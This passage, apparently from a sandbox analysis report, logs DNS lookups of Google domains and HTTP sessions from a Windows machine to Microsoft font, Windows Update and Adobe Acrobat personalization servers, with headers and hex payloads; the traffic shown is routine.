                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:40.373441935 CEST1.1.1.1192.168.2.70x99a8No error (0)youtube-ui.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.317276001 CEST1.1.1.1192.168.2.70x17c6No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.317276001 CEST1.1.1.1192.168.2.70x17c6No error (0)youtube-ui.l.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com172.217.16.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com142.250.74.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:42.318690062 CEST1.1.1.1192.168.2.70x8c82No error (0)youtube-ui.l.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:44.625535011 CEST1.1.1.1192.168.2.70x8560No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:44.626332045 CEST1.1.1.1192.168.2.70x19d0No error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:47.785459042 CEST1.1.1.1192.168.2.70x5d69No error (0)sustainability.google216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:47.785459042 CEST1.1.1.1192.168.2.70x5d69No error (0)sustainability.google216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:47.785459042 CEST1.1.1.1192.168.2.70x5d69No error (0)sustainability.google216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:47.785459042 CEST1.1.1.1192.168.2.70x5d69No error (0)sustainability.google216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:51.725193977 CEST1.1.1.1192.168.2.70xbb0bNo error (0)sustainability.google216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:51.725193977 CEST1.1.1.1192.168.2.70xbb0bNo error (0)sustainability.google216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:51.725193977 CEST1.1.1.1192.168.2.70xbb0bNo error (0)sustainability.google216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:51.725193977 CEST1.1.1.1192.168.2.70xbb0bNo error (0)sustainability.google216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:54.257392883 CEST1.1.1.1192.168.2.70xedcdNo error (0)www.blog.googleghs-svc-https-sni.ghs-ssl.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:54.257392883 CEST1.1.1.1192.168.2.70xedcdNo error (0)ghs-svc-https-sni.ghs-ssl.googlehosted.com216.58.206.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:54.270127058 CEST1.1.1.1192.168.2.70x1c1cNo error (0)www.blog.googleghs-svc-https-sni.ghs-ssl.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:55.619926929 CEST1.1.1.1192.168.2.70x6680No error (0)blog.google216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:55.619926929 CEST1.1.1.1192.168.2.70x6680No error (0)blog.google216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:55.619926929 CEST1.1.1.1192.168.2.70x6680No error (0)blog.google216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:55.619926929 CEST1.1.1.1192.168.2.70x6680No error (0)blog.google216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:56.445507050 CEST1.1.1.1192.168.2.70x2bdaNo error (0)blog.google216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:56.445507050 CEST1.1.1.1192.168.2.70x2bdaNo error (0)blog.google216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:56.445507050 CEST1.1.1.1192.168.2.70x2bdaNo error (0)blog.google216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:41:56.445507050 CEST1.1.1.1192.168.2.70x2bdaNo error (0)blog.google216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:21.502929926 CEST1.1.1.1192.168.2.70xbf33No error (0)googletagmanager.com142.250.186.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:21.660281897 CEST1.1.1.1192.168.2.70xac0eNo error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:21.660281897 CEST1.1.1.1192.168.2.70xac0eNo error (0)googlehosted.l.googleusercontent.com142.250.185.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:21.660702944 CEST1.1.1.1192.168.2.70xa9aeNo error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:29.959575891 CEST1.1.1.1192.168.2.70x2b04No error (0)csp.withgoogle.com216.58.206.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:33.718404055 CEST1.1.1.1192.168.2.70xef67No error (0)mail.google.com142.250.185.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:39.575764894 CEST1.1.1.1192.168.2.70x80d7No error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:39.575764894 CEST1.1.1.1192.168.2.70x80d7No error (0)googlehosted.l.googleusercontent.com142.250.74.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:39.576320887 CEST1.1.1.1192.168.2.70xac5dNo error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:39.576334953 CEST1.1.1.1192.168.2.70x5c1dNo error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:39.576334953 CEST1.1.1.1192.168.2.70x5c1dNo error (0)googlehosted.l.googleusercontent.com172.217.18.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:39.577037096 CEST1.1.1.1192.168.2.70x6f99No error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:39.577037096 CEST1.1.1.1192.168.2.70x6f99No error (0)googlehosted.l.googleusercontent.com142.250.74.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:39.580755949 CEST1.1.1.1192.168.2.70xe611No error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:50.284773111 CEST1.1.1.1192.168.2.70xb5e6No error (0)play.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:51.270715952 CEST1.1.1.1192.168.2.70x5778No error (0)play.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:54.376044035 CEST1.1.1.1192.168.2.70xa994No error (0)smallbusiness.withgoogle.com142.250.186.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:55.558907986 CEST1.1.1.1192.168.2.70xf016No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:55.558947086 CEST1.1.1.1192.168.2.70xa80cNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:55.567419052 CEST1.1.1.1192.168.2.70x2b8cNo error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:55.567419052 CEST1.1.1.1192.168.2.70x2b8cNo error (0)googlehosted.l.googleusercontent.com172.217.18.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:55.567943096 CEST1.1.1.1192.168.2.70x543cNo error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:42:56.635514021 CEST1.1.1.1192.168.2.70x3efaNo error (0)smallbusiness.withgoogle.com142.250.184.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:01.602204084 CEST1.1.1.1192.168.2.70x245eNo error (0)survey.g.doubleclick.netappspot.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:01.602204084 CEST1.1.1.1192.168.2.70x245eNo error (0)appspot.l.google.com142.250.186.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:01.606838942 CEST1.1.1.1192.168.2.70x2f9fNo error (0)survey.g.doubleclick.netappspot.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:03.106745005 CEST1.1.1.1192.168.2.70xbe5eNo error (0)about.google216.239.32.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:06.177875996 CEST1.1.1.1192.168.2.70xe291No error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:06.177875996 CEST1.1.1.1192.168.2.70xe291No error (0)googlehosted.l.googleusercontent.com142.250.185.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:06.179578066 CEST1.1.1.1192.168.2.70xe580No error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:06.919785023 CEST1.1.1.1192.168.2.70xc36fNo error (0)about.google216.239.32.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:13.952822924 CEST1.1.1.1192.168.2.70x1c96No error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:13.952822924 CEST1.1.1.1192.168.2.70x1c96No error (0)googlehosted.l.googleusercontent.com142.250.185.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:44.670620918 CEST1.1.1.1192.168.2.70x41c2No error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Sep 27, 2024 16:43:44.670620918 CEST1.1.1.1192.168.2.70x41c2No error (0)googlehosted.l.googleusercontent.com142.250.185.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          0192.168.2.749712184.28.90.27443
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:30 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:30 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                          Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                          X-CID: 11
                                                                                                                                                                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                          X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=25935
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:40:30 GMT
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          X-CID: 2


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          1192.168.2.749715184.28.90.27443
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:31 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                          Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:31 UTC514INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                          Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                          X-CID: 11
                                                                                                                                                                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                          X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=25976
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:40:31 GMT
                                                                                                                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          X-CID: 2
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:31 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          2192.168.2.74971718.207.85.2464437764C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:32 UTC1473OUTGET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: p13n.adobe.io
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Chromium";v="105"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                                                                                                                                                                          x-adobe-uuid: c583ad55-e27a-405e-ae1a-c48b4361aa9d
                                                                                                                                                                                                                                                                                          x-adobe-uuid-type: visitorId
                                                                                                                                                                                                                                                                                          x-api-key: AdobeReader9
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Origin: https://rna-resource.acrobat.com
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://rna-resource.acrobat.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:32 UTC608INHTTP/1.1 200
                                                                                                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:40:32 GMT
                                                                                                                                                                                                                                                                                          Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Length: 6301
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          x-request-id: gmzcn8dT1u0nbLH5rMThaZONc9v26m8r
                                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: Authorization,Content-Type,X-Api-Key,cache-control,User-Agent,If-None-Match,x-adobe-uuid,x-adobe-uuid-type, X-Request-Id
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: x-request-id
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:32 UTC6301INData Raw: 7b 22 73 75 72 66 61 63 65 73 22 3a 7b 22 44 43 5f 52 65 61 64 65 72 5f 52 48 50 5f 42 61 6e 6e 65 72 22 3a 7b 22 63 6f 6e 74 61 69 6e 65 72 73 22 3a 5b 7b 22 63 6f 6e 74 61 69 6e 65 72 49 64 22 3a 31 2c 22 63 6f 6e 74 61 69 6e 65 72 4c 61 62 65 6c 22 3a 22 4a 53 4f 4e 20 66 6f 72 20 52 65 61 64 65 72 20 44 43 20 52 48 50 20 42 61 6e 6e 65 72 22 2c 22 64 61 74 61 54 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 2c 22 64 61 74 61 22 3a 22 65 79 4a 6a 64 47 45 69 4f 6e 73 69 64 48 6c 77 5a 53 49 36 49 6d 4a 31 64 48 52 76 62 69 49 73 49 6e 52 6c 65 48 51 69 4f 69 4a 47 63 6d 56 6c 49 44 63 74 52 47 46 35 49 46 52 79 61 57 46 73 49 69 77 69 5a 32 39 66 64 58 4a 73 49 6a 6f 69 61 48 52 30 63 48 4d 36 4c 79 39 68 59 33 4a 76 59 6d 46 30
                                                                                                                                                                                                                                                                                          Data Ascii: {"surfaces":{"DC_Reader_RHP_Banner":{"containers":[{"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","dataType":"application/json","data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          3192.168.2.749721104.78.188.1884437764C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:36 UTC475OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: armmf.adobe.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          If-None-Match: "78-5faa31cce96da"
                                                                                                                                                                                                                                                                                          If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:36 UTC198INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                                                                                                                                                                                                                                                          ETag: "78-5faa31cce96da"
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:40:36 GMT
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          4192.168.2.74972020.114.59.183443
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:37 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=d9DofA5AZfZodrn&MD=5fM4XGeV HTTP/1.1
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:37 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                          MS-CorrelationId: e9ae81d5-eb9e-4ac4-97a5-c61e04df2180
                                                                                                                                                                                                                                                                                          MS-RequestId: f2aea375-4f44-460b-aab8-598a91032345
                                                                                                                                                                                                                                                                                          MS-CV: eJwfA7/PaU2Zm61e.0
